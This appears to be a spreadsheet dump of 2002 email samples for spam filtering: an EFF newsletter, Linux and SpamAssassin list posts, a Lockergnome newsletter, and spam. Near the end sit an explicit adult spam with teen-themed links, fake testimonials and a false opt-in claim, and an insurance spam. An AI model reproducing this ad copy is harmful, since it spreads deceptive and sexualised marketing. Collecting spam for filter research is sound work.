 Links:
 For this release:
 http://www.eff.org/IP/P2P/MGM_v_Grokster/20020909_eff_pr.html
 Documents related to Metro-Goldwyn Mayer v. Grokster case:
 http://www.eff.org/IP/P2P/MGM_v_Grokster/
 Janis Ian's "Internet Debacle" article:
 http://www.janisian.com/article-internet_debacle.html
 - end -
 *Electronic Frontier Foundation Holds Second Annual Share-In
 John Perry Barlow, Mountain Girl Garcia Host Free Music Fest
 San Francisco - Join the Electronic Frontier Foundation and five Bay
 Area bands for an afternoon of live music and outdoor fun at EFF's
 second annual Share-In. The festival will be held in Golden Gate
 Park's Music Concourse Bandshell on Saturday, September 14th from noon
 - 5pm. The celebration of independent music will be hosted by Grateful
 Dead lyricist and EFF co-founder John Perry Barlow and former wife of
 the late great Jerry Garcia, Mountain Girl Garcia.
 Artists participating in this event will permit recording of their
 performances by those in attendance in support of EFFs Open Audio
 License (OAL). Musicians performing at the event include: the Box Set
 Duo - clown princes of folk-rock, the classic funk band Funkmonsters,
 celtic world-fusion group Hy Brassyl, harmony based folk-pop band
 Atticus Scout, and Berkeley-based party band Shady Lady.
 In addition to music, the Share-In will feature performers including
 Ashley Foster the One Wheeled Wonder, the Existential Circus,
 Frantastic Hands, the Metronome Dancers, and Willy Bologna and his
 Sideshow Circus. Bring your family and friends!
 Ben and Jerry's will sell their famous ice cream, and Cartwheel
 Catering will be on site with hot dogs, pretzels, and churros.
 Proceeds from the Share-In will go directly to EFF's Campaign for
 Audiovisual Free Expression (CAFE), which oversees projects such as
 the Open Audio License. CAFE empowers the creative community in
 cyberspace by protecting the public's access to and use of audiovisual
 technologies.
 The Open Audio License is a tool that EFF has developed in order to
 help artists share music more directly with their fans, without
 sacrificing recognition for their creativity. The OAL encourages
 collaboration, providing artists with an alternative to a business
 model strictly driven by profit. Based on the open source and free
 software initiatives for software development, the OAL encourages
 artists to share with one another and their fans
 Adoption of the OAL does not mean that artists go unrewarded for their
 work. On the contrary, the OAL permits artists to share single tracks
 or performances and gain widespread recognition for their work without
 relying on intermediaries. EFF encourages new models of music
 distribution in the digital world that benefit the artists themselves.
 The Internet makes it possible to drastically reduce the overhead for
 packaging and distributing music, which is where record companies
 currently spend most of the money that could be going to artists. EFF
 is committed to developing tools that empower artists to take control
 over their own art and to be compensated appropriately for their works.
 When: Saturday, September 14th, Noon-5pm
 Where: Music Concourse Bandshell in Golden Gate Park, near the
 Japanese Tea Gardens between MLK Drive and JFK Drive
 More Information and Travel Directions:
 http://www.eff.org/events/share-in/
 Links:
 EFF's Cafe Project:
 http://www.eff.org/cafe/
 The Open Audio License:
 http://www.eff.org/IP/Open_licenses/eff_oal.html
 - end -
 *Help With Our Internet Blocking in Schools Study
 If you know of any public school students, teachers, school
 administrators, school board members, parents, or recent public school
 alumni in the United States who are willing to speak about the impact
 of Internet blocking on educational opportunities, the EFF would like
 to make contact with them. We are especially looking for people in or
 near the following areas:
     * Asheville, NC
     * Boston, MA
     * Nashville, TN
     * New York City
     * San Francisco, CA
 Please have them contact:
 Will Doherty
 wild@eff.org
 - end -
 *Deep Links
 Deep Links features noteworthy news items, victories, and threats from
 around the Internet.
 Community Wireless Allows People to Break Away from Czech Telekom
 Another wireless community helps bring access to rural areas and those
 who otherwise would not have access. See the story at:
 http://www.pbj.cz/user/article.asp?ArticleID=158576
 - end -
 Google Blocked in China
 A populat search engine is blocked in China and internet traffic is
 constantly being monitored. Read about it at:
 http://news.bbc.co.uk/2/hi/technology/2231101.stm
 - end -
 iPod Clone Spoiled by DRM
 Second generation USB speed rendered useless by DRM encryption used in
 Toshiba's Mobilphile:
 http://www.zdnet.com/products/stories/reviews/0,4161,2877898,00.html
 - end -
 The Netizen in 2002
 What does it mean to be a Netizen today? Contribute to the call for
 submissions found at:
 http://www.well.com/~doctorow/netizen.txt
 - end -
 *Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation
 454 Shotwell Street
 San Francisco CA 94110-1914 USA
 +1 415 436 9333 (voice)
 +1 415 436 9993 (fax)
   http://www.eff.org/
 Editor:
 Ren Bucholz, Activist
   ren@eff.org
 To Join EFF online, or make an additional donation, go to:
   http://www.eff.org/support/
 Membership &amp; donation queries: membership@eff.org
 General EFF, legal, policy or online resources queries: ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors for
 their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, please visit http://action.eff.org/subscribe/.
 &gt;&gt;From there, you can update all your information. If you have already
 subscribed to the EFF Action Center, please visit
 http://action.eff.org/action/login.asp.
 To unsubscribe from the EFFector mailing list, send an email to
 alerts@action.eff.org with the word "Remove" in the subject.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at:
   http://www.eff.org/effector
 To get the latest issue, go to:
   http://www.eff.org/effector/current.html
 ++++++++++++++++++++++++
 You received this message because qqqqqqqqqqs-eff@spamassassin.taint.org is a member of
 the mailing list originating from alerts@action.eff.org. To unsubscribe 
 from all mailing lists originating from alerts@action.eff.org, send an 
 email from qqqqqqqqqqs-eff@spamassassin.taint.org to alerts@action.eff.org with 'Remove' as the
 only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 28 August 2002 01:50 pm, Robin Lynn Frank wrote:
 &gt; On Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:
 &gt; &gt; Also, that little haiku is a copyrighted work, so not only CAN
 &gt; &gt; Habeas sue, they MUST sue to protect their copyright. And since
 &gt; &gt; it's a trademark as well, that's a double-whammy. Habeas has
 &gt; &gt; some pretty high-powered legal people, who will gladly go to
 &gt; &gt; town on violators.
 &gt; &gt; The whole point here is to give them the legal leverage they
 &gt; &gt; need to put spammers out of business, and not only block mail
 &gt; &gt; from them, but allow through the things that really AREN'T spam.
 &gt; And if a spammer forges headers???
 There must be *some* way of tracking a spammer down, since they are planning 
 on making money from the spam.  What a court would consider evidence of being 
 the spammer is another question.
 -- 
 Give a man a match, and he'll be warm for a minute, but set him on
 fire, and he'll be warm for the rest of his life.
 ICQ: 132152059 | Advanced SPAM filtering software: http://spamassassin.org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</si>
  <si>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Re: [ILUG] directory merging
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt;  I've two directories, that once upon a time contained the same files.
 &gt; 
 &gt;  Now, they don't.
 &gt; 
 &gt;  Is there a tool to merge the two - create a new directory where if the
 &gt; files are the same, they aren't changed, if they are different, the one
 &gt; with the most recent datestamp is used...
 Just for the record mc has a nice directory
 comparison function. This is really nice
 when using the ftp VFS for e.g. Of course
 if you use something like ftpfs you can use
 the previously mentioned tools.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: cvs access working?
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone access the CVS server for exmh?
 The last thing I was able to do was try a "cvs commit", but
 I got an "up-to-date check failed" for a couple files,
 exmh.CHANGES and lib/msg.tcl, I think, so I then tried "cvs update".
 I get a password prompt, and then it just hangs.
 cat CVS/Root
 welch@cvs.sourceforge.net:/cvsroot/exmh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</si>
  <si>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Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a
 compile error (and many warnings) for spamc.  The "perl Makefile.PL"
 does OK, but when I do the make, I get this:
 cc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C
 -O4 spamd
 /spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv
 -lutil
 cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has
 no linkage and has a prior declaration in this scope at line number 592 in file
 /usr/include/sys/types.h. (nolinkage)
 typedef unsigned long   in_addr_t;      /* base type for internet
 address */
 ------------------------^
 cc: Warning: spamd/spamc.c, line 169: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "unsigned char". (ptrmismatch)
   if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;
 max_size)
 -----------------------------^
 cc: Warning: spamd/spamc.c, line 174: In this statement, the referenced
 type of
 the pointer value "header_buf" is "char", which is not compatible with
 "const unsigned char". (ptrmismatch)
     full_write (out,header_buf,bytes2);
 --------------------^
 cc: Warning: spamd/spamc.c, line 202: In this statement, the referenced
 type of
 the pointer value "header_buf" is "char", which is not compatible with
 "const unsigned char". (ptrmismatch)
     full_write (out,header_buf,bytes2);
 --------------------^
 cc: Warning: spamd/spamc.c, line 203: In this statement, the referenced
 type of the pointer value "msg_buf" is "char", which is not compatible
 with "const unsigned char". (ptrmismatch)
     full_write (out,msg_buf,bytes);
 --------------------^
 cc: Warning: spamd/spamc.c, line 306: In this statement, the referenced
 type of the pointer value "buf" is "char", which is not compatible with
 "unsigned char".
  (ptrmismatch)
           if(full_read (in,buf,2,2) != 2 || !('\r' == buf[0] &amp;&amp; '\n' ==
 buf[1]))
 ---------------------------^
 cc: Warning: spamd/spamc.c, line 321: In this statement, the referenced
 type of
 the pointer value "buf" is "char", which is not compatible with
 "unsigned char".
  (ptrmismatch)
     while((bytes=full_read (in,buf,8192, 8192)) &gt; 0)
 -------------------------------^
 cc: Warning: spamd/spamc.c, line 348: In this statement, the referenced
 type of
 the pointer value "out_buf" is "char", which is not compatible with
 "const unsigned char". (ptrmismatch)
       full_write (out, out_buf, out_index);
 -----------------------^
 cc: Warning: spamd/spamc.c, line 497: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "const unsigned char". (ptrmismatch)
       full_write (STDOUT_FILENO,msg_buf,amount_read);
 --------------------------------^
 cc: Warning: spamd/spamc.c, line 512: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "const unsigned char". (ptrmismatch)
       full_write(STDOUT_FILENO,msg_buf,amount_read);
 -------------------------------^
 *** Exit 1
 Stop.
 Can anyone suggest a way to get around this?   TIA...
 Jim
 *-------------------------------------------------------------------------*
 * James H. McCullars                 I Phone: (256) 824-2610              *
 * Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *
 * Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *
 * The University of Alabama          I -----------------------------------*
 *    in Huntsville                   I                                    *
 * Huntsville, AL 35899               I This space for rent - CHEAP!       *
 *-------------------------------------------------------------------------*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</si>
  <si>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
 &gt; On Thu, Sep 19, 2002 at 11:11:47AM -0400, Bill Stoddard wrote:
 &gt; &gt; people? Either these folks are social misfits who have no
 &gt; understanding of
 &gt; &gt; human interactions (else they would try more constructive means
 &gt; to get their
 &gt; &gt; message across) or they are just out to get their rocks off
 &gt; regardless of
 &gt; &gt; how it affects other people, and that is immoral at best and
 &gt; downright evil
 &gt; &gt; at worst.
 &gt;
 &gt; Are you kidding? It was fucking BRILLIANT. Do you know what
 &gt; exposure that got
 &gt; them? They sat perfectly so that the cameras could focus on the mildly
 &gt; exasperated Rumsfeld and their "UN Inspections not war" banner.
 What I am specifically referring to is protesters shouting down speakers or
 making so much noise that it interferes with the speaker. That's wrong,
 immoral and unethical no matter what the political bent of the speakers and
 the protesters. Rowdy protests in their own venue (on a college campus or
 some of the commons areas of DC) is perfectly fine by me. Waving signs to
 get attention is fine.
 &gt; That picture
 &gt; will be dominating the news cycles in China, Iraq, Russia, Germany, and
 &gt; France, at least. For goodness sakes, you're arguing about it on FoRK. In
 &gt; politics by sound-bite, those two rude hags kicked ass and took names.
 &gt;
 &gt; For the record, I don't think they even got arrested, which is a shame.
 Well, Owen implied the protesters were arrested. Was he just jacking himself
 off at the expense of other people? Exactly why is it a shame that they were
 not arrested? Think about what you are saying and what you are telegraphing
 about your state of mind here. You WANT people to do bad things (ie, police
 arresting peaceful protesters) if it can help you further your cause? That
 attitude just sucks. You have no moral ground to stand on if that is what
 you believe.
 &gt; It is part of the game -- make an ass of yourself, get your point on
 &gt; the nightly
 &gt; news, spend a couple days in the clink for disorderly.
 Sure, just don't whine about getting arrested if you make it a point to get
 in someone's face.
 One other comment... Most of the people that are protesting against taking
 out the Iraqi dictator wouldn't give a rats ass if a nuke went off in NYC.
 They simply wouldn't care so why in the hell should the Americal public
 listen to them on matters of national security?
 So enlighten me, exactly why shouldn't Hussein be taken out? And if your
 answr boils down to "i don't give a shit about what happens to the US", you
 can kiss my ass :-)
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Entrance Slouch
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020719.html"&gt;
       http://www.lockergnome.com/issues/daily/20020719.html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&lt;/style&gt;&lt;title&gt;20020719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07.19.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, a Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I had just finished giving &lt;a href="http://ben.franske.com/"&gt;Ben&lt;/a&gt; and his sister a "behind
 the scenes" look at our set, when Patrick walked in and poked me
 in the left arm repeatedly with his index finger - until I hung up
 the phone and gave him my full, undivided attention. "Did you know
 that your GnomeTomes are being featured in the 'Barnes &amp; Noble'
 eBooks section," he asked. Well, that was news to me. After
 flailing over to his workstation and flipping through a few pages,
 we ultimately realized that he had discovered the entry on the
 main page for &lt;a href="http://www.amazon.com/exec/obidos/redirect?tag=lockergnomedigit&amp;path=tg/browse/-/551440/"&gt;Amazon's
 eBooks&lt;/a&gt;. Cool! "With a name that inspires curiosity and sparks the imagination,
 Lockergnome represents one of the latest and most popular
 additions to our e-documents catalog. At prices starting under $3,
 these eminently useful titles from one of the most fanciful-sounding
 publishers we've encountered are hard to resist." Thank
 you for helping us along, gang. My ultimate goal is to kick that
 Godin guy out of the top ten - if only for a day.
 &lt;p&gt;
 &lt;table align="left"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size="1"&gt;&lt;B&gt;PC World Picks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,6477,00.asp"&gt;Remove Plus! 2002&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,8087,00.asp"&gt;Ashampoo UnInstaller&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5046,00.asp"&gt;Norton Uninstall Dlx&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,8092,00.asp"&gt;Perfect Companion&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7921,00.asp"&gt;Uninstall Manager&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,17624,00.asp"&gt;Remove 4Good&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,21860,00.asp"&gt;Eraser 2000&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 I must now thank both Lockergnomie Dan Reain and Nancy Workman-Luter
 (both from Sonic Foundry) for donating a couple more prizes
 for this year's &lt;a href="http://www.gnomedex.com/"&gt;Gnomedex
 conference&lt;/a&gt;. Just by walking through the entrance with your
 pass in hand, you'll be automatically entered to win one of the
 copies of Sound Forge XP! And this software is no slouch; for home
 users and professionals on a Windows OS, it's one of the best
 audio editors around. If it can't do something you need to have
 done, then I bet it can't be done at all. Expect a full
 Lockergnome review from our Digital Media editor (Jake) at some
 point in the future. Until then, feel free to
 &lt;a href="http://www.sonicfoundry.com/download/step2.asp?DID=257"&gt;download
 the demo&lt;/a&gt;. If I can ever decide on a digital video camera,
 perhaps their Vegas Video will sit on my system, too. Melanie and
 I were talking about hardware options the other day. She's leaning
 towards a Canon, too. Unless I hear or see otherwise, the ZR45MC
 is at the top of my list. Still and low-light images aren't the
 best, but I'm not really up for spending much more than $1000.
 Neither is Gretchen, oddly enough.
 &lt;P&gt;
 As much as I dislike the AOL client user interface, I gotta admit:
 it's pretty darn powerful underneath. For instance, you can
 "unsend" an e-mail message (but only if it was sent to another
 America Online member and s/he hasn't read it yet). If you travel
 often, the service is a bargain. If you know someone who just
 needs the Internet basics, it's perfect. One caveat: the software
 puts RealPlayer on your system without asking you first. I was a
 little upset when I discovered its icon sitting in my Start Menu.
 Nowhere during the installation process did I see a way to opt out
 of it. I'm not surprised; there are more advertisements on AOL
 than there are from your average "free" Web page host. You may
 have asked yourself: "What is Chris doing installing AOL in the
 first place?!" I don't &lt;a href="http://www.iblameyou.com/"&gt;blame
 you&lt;/a&gt;. No, hell did not freeze over. We've been doing tips for
 their users on our show lately, and I decided to throw it on my
 laptop for testing purposes. Perhaps 8.0 will be better?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&lt;b&gt;SEPopular v1.02 [2.4M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.monocle-solutions.com/sepopular/sepopular.shtml" class="URL"&gt;http://www.monocle-solutions.com/sepopular/sepopular.shtml&lt;/a&gt;
 &lt;p&gt;
 {Popularity contest} I never considered myself to be part of the popular crowd. But how do you really know if others consider you to be popular? Well, if you are talking about the popularity of your website (although the junior high kids are more concerned about the labels on your clothes), then all you have to do is download SEPopular. Search engines (such as Google) rank your site by determining how many people link to your site (the more people who link to your site, the better your ranking). With this investigative tool, you can see how many links to your website there are (from the perspective of five major search engines). You don't just have to check out your own website, though... all you have to do is enter the URL of a website, and out comes the TRUTH about its popularity. Another nice feature of this software is that you can import web addresses from a .txt file so that you don't have to enter each one individually. It's all about keeping up with thejoneses.com.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;MB-Ruler v0.93 [441k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.markus-bader.de/MB-Ruler/" class="URL"&gt;http://www.markus-bader.de/MB-Ruler/&lt;/a&gt;
 &lt;p&gt;
 {Measure distance and angles} I was never very good in geometry... Pythagoras would be disappointed that I can never exactly remember his theorem. (What did a hippopotamus have to do with triangles anyway? That animal seems to be pretty round if you ask me...) Anyway, MB-Ruler is quite a useful little application, especially for anyone who has had to work with banners and graphics for the Web. You can measure angles in radians or degrees, and distances in inches, centimeters, twips, points or pixels. And if those weren't enough options, you can even set your own scale. Everything about MB-Ruler can be customized, including its size and color. Talk about an application that "measures up!"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Outlook 2002, without a server!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;!-- SYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Your Outlook Express Password Is Not Retained&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://support.microsoft.com/default.aspx?scid=kb;en-us;Q264672" class="URL"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;Q264672&lt;/a&gt;
 &lt;p&gt;
 {Fixing password problems} Now where did I put that password? I thought I had Outlook Express keeping track of it for me... If you use Outlook Express (for Windows 2000 or Windows XP) to check your e-mail, then this article is for you. Occasionally your password for Outlook Express is not retained, even though you have checked the "Remember Password" checkbox. To fix this particular issue, you will need Administrator privileges in order to make some modifications to your system's registry. The article contains steps for backing up your registry and, since you can cause a lot of accidental damage while tweaking the registry... I would recommend that you follow them.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&lt;b&gt;Screen Mate Builder v1.0b [927k] W9x/2k/XP US$29&lt;/b&gt;
 &lt;br&gt;    Unearthed by Duo Yi
 &lt;p&gt;
 &lt;a href="http://www.screenmate.net/" class="URL"&gt;http://www.screenmate.net/&lt;/a&gt;
 &lt;p&gt;
 {Animated desktop pal} Bored with your PC's desktop? All it does is sit there and stare at you, never saying a word. It sounds like you need a little something to pump some life into that desktop! With Screen Mate Builder, you can make your very own animated screen mate from any animated GIF file. On top of that, you can add background music (MIDI files) and sound clips (WAV files) to your new desktop chum. Share your creation with friends and family: trust me, it's better that they know, and don't think you just have an imaginary friend. No programming experience required - just step through the wizard and out pops your very own screen mate. Can't beat those instant buddies!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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeSTORE. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Re-route E-mail Forwarding Service&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.re-route.com/" class="URL"&gt;http://www.re-route.com/&lt;/a&gt;
 &lt;p&gt;
 Soon, it will be time for us to fill out the change of address cards as we relocate to a different area of the city. You probably knew that your snail mail could be forwarded, but what about your e-mail? Back in the days of college e-mail accounts, every time I changed ISPs I had to send a mass e-mail to my contacts and hope they saved my new address, otherwise I could miss out on getting their correspondence. The great thing about Re-Route's service is that I don't have to worry about lost e-mails after changing ISPs. Sign up for the service, and they will take any e-mail sent to your old account and forward it to your new e-mail address. After that, Re-Route e-mails the sender to notify them of your new address. If you are with AOL, MSN, or any of their featured partners, then the first month is free. If not, then Re-Route charges a very nominal fee of ten bucks for the one month and twenty-five bucks for 3 months. Have someone else handle all my changing e-mail address need!
 s? Sounds like money well spent!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Just because it is summer and bright out doesn't mean that you should stop using your flash on your digital camera. Bright sunlight creates harsh shadows that may cause you to lose detail. Don't you hate those pictures where you can only see half of someone's face because the other half is black from a shadow? Well, the cure is in front of you... use your flash during the daytime to throw a little light into those shadows. Some cameras allow you to adjust how much flash is used, also known as flash exposure compensation. If you can adjust the output of your flash, then try it at the lowest setting first. Remember, you don't want to completely get rid of the shadows because they add depth to your photo. Keep increasing your flash output until you get your desired results. Also, as an extra tip, don't forget that you can conserve battery life on your digital camera by turning on the autofocus option and turning off the LCD display.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href="http://www.lockergnome.com/issues/daily/20020719.html"&gt;http://www.lockergnome.com/issues/daily/20020719.html&lt;/a&gt;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Entrance Slouch --&gt;
 The way to kill competition is to create something too good for competition
 to imitate.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Account zzzz@spamassassin.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">New Account For: zzzz@spamassassin.taint.org 
 ##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 #          3 of the Best Adult Sites             #
 #     on the Internet for Absolutely FREE        #
 #                                                #
 ##################################################
 &gt; &gt; &gt; &gt; YOU HAVE INSTANT ACCESS TO ALL 3 SITES NOW
 &gt; &gt; &gt; &gt; User Name: zzzz@spamassassin.taint.org
 &gt; &gt; &gt; &gt; Password: 1534
 - - - - - - - - - - - - - - - - - - - -
 NEWS 09/24/02
 With just over 4.8 Million Members that signed up for FREE, Last month there were 921,947 New
 Members. Are you one of them yet???
 - - - - - - - - - - - - - - - - - - - -
 Our Membership FAQ
 Q. Why are you offering free access to 3 adult membership sites for free? 
 A. I have advertisers that pay me for ad space so you don't have to pay for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 3 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 &gt; &gt; &gt; &gt; Fill in the required info and they won't charge you for the Free
 Membership!
 &gt; &gt; &gt; &gt; If you don't believe us, just read their terms and conditions.
 - - - - - - - - - - - - - - - - - - - -
 # 3. &gt; Lucky Amateur Wives
 http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
 You won't believe what we take these Wives into doing...FREE VIP Membership!!
 # 2. &gt; New! just added today: Cum Drinkers
 http://www.bozombo.com/cumdrinkers/index.php?affid=1534
 950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!
 # 1. &gt; Filthy Teen Sluts
 http://www.bozombo.com/filthyteensluts/index.php?affid=1534
 The Ultimate XXX TEEN Site... FREE VIP Membership!!
 - - - - - - - - - - - - - - - - - - - -
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for the last two years!  Your
 Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part about your porn sites, is
 that they're absolutely FREE!
 - - - - - - - - - - - - - - - - - - - -
 Disclaimer:
 We are strongly against sending unsolicited emails to those who do not wish to receive our special
 mailings. You have opted in to one or more of our affiliate sites requesting to be notified of any
 special offers we may run from time to time. We also have attained the services of an independent
 3rd party to overlook list management and removal services. This is NOT unsolicited email. If you
 do not wish to receive further mailings, please go to http://greenzer.com/remove.php to be removed
 from the list. Please accept our apologies if you have been sent this email in error. We honor all
 removal requests.
 Thank you zzzz@spamassassin.taint.org
 oldhtlheuhcclco
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: More cash for the business you already write - IMMEDIATELY
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_3A5886_01C24C5D.B368E220
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Get a kick out of our huge annuity bonuses!=09
  Earn a $1,000 cash bonus*=0A=
 for every 5 annuity applications=0A=
 with any of
 our four top carriers=0A=
 by 9-30-02!=0A=
 Deadline too soon? No Problem!=0A=
 Earn an
 $800 cash bonus*=0A=
 for every 5 annuity applications=0A=
 with any of our four
 top carriers=0A=
 by 12-31-02!
  	 =09
  	=20
 Get your bonus! Call M&amp;O Marketing today!
  800-862-0959
 =97 or =97
 Please fill out the form below for more information =09
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
 *Bonuses awarded from M&amp;O Marketing on paid, issued business. For agent
 use only. Offer subject to change without notice. Offer starts 7/15/02.
 Offer ends 12/31/02. Offer good in all states except: WI, IN, DE. Not
 available with all carriers.
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_3A5886_01C24C5D.B368E220
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;More cash for the business you already write - =
 IMMEDIATELY&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
